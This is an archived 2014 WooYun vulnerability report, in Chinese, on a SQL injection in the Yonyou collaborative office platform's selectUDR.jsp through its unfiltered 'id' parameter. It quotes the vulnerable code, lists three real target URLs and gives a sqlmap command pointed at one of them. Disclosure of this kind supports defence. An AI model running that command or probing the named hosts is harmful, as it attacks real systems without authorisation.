当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-072338

漏洞标题:用友软件协作办公平台通用DBA权限SQL注入漏洞之三

相关厂商:用友软件

漏洞作者: 路人甲

提交时间:2014-08-15 18:02

修复时间:2014-11-10 18:04

公开时间:2014-11-10 18:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-08-15: 细节已通知厂商并且等待厂商处理中
2014-08-20: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-10-14: 细节向核心白帽子及相关领域专家公开
2014-10-24: 细节向普通白帽子公开
2014-11-03: 细节向实习白帽子公开
2014-11-10: 细节向公众公开

简要描述:

与http://www.wooyun.org/bugs/wooyun-2014-072183非同目录下

详细说明:

system/config/selectUDR.jsp

<%
//String sIsModelWindow="0";
UserAnalyse userAnalyse=(UserAnalyse)ResourceManage.getContext("userAnalyse");
String saveValue=HtmlFormat.format(StringUtil.ISOToGBK(request.getParameter("id")));//注入点
String isModel=HtmlFormat.format(request.getParameter("isModel"));
String tagValue=HtmlFormat.format(StringUtil.ISOToGBK(request.getParameter("tagValue")));
String tagShow=HtmlFormat.format(StringUtil.ISOToGBK(request.getParameter("tagShow")));
String showValue="";
saveValue="null".equals(saveValue)?"":saveValue;
//if("".equals(saveValue)){
//saveValue="null".equals(tagValue)?"":tagValue;
//}
Map map=null;
if(!"".equals(saveValue))
map=userAnalyse.getAllUserName(saveValue);//查询
if(map!=null){
for(Iterator it=map.keySet().iterator();it.hasNext();){
String v=(String)it.next();
if(v!=null)
showValue+=v+",";
}
if(!"".equals(showValue)){
showValue=showValue.substring(0,showValue.lastIndexOf(","));
}
}
String promptStr=request.getParameter("code");

%>

漏洞证明:

#1.http://oa.danzi.com.cn:9090/system/config/selectUDR.jsp?id=1

y.jpg


#2.http://fsd2014.f3322.org:9090/system/config/selectUDR.jsp?id=1
测试语句:
sqlmap -u "http://fsd2014.f3322.org:9090/system/config/selectUDR.jsp?id=1" --random-agent --level 5--risk 3

y11.jpg


#3.http://220.168.210.109:9090/system/config/selectUDR.jsp?id=1

y.jpg

修复方案:

敏感字符过滤
安全狗

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-11-10 18:04

厂商回复:

最新状态:

暂无